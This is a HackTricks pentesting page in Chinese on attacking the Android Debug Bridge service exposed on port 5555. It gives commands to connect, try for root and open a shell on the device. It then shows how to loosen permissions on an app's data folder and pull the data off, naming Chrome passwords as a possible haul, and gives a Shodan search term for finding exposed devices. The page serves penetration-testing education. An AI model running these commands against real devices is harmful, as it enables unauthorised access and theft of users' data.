hacktricks/network-services-pentesting/5555-android-debug-bridge.md

3.8 KiB
Raw Blame History

5555 - Android Debug Bridge

通过 htARTE (HackTricks AWS Red Team Expert)从零到英雄学习AWS黑客攻击

支持HackTricks的其他方式

基本信息

Android Debug Bridge (adb) 是一个多功能的命令行工具允许你与设备进行通信。adb命令支持多种设备操作例如安装和调试应用程序,并提供访问Unix shell的能力,你可以使用它在设备上运行各种命令。(来源于这里

默认端口5555。

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

连接

如果发现ADB服务在设备的端口上运行并且你可以连接到它你可以在系统内获得一个shell

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

有关更多ADB命令请查看以下页面

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

转储应用数据

为了完整下载应用程序的数据,您可以:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

你可以使用这个技巧来检索像chrome密码这样的敏感信息。更多信息请查看这里提供的信息和参考资料。

Shodan

  • android debug bridge
从零开始学习AWS黑客攻击直到成为专家通过 htARTE (HackTricks AWS Red Team Expert)

其他支持HackTricks的方式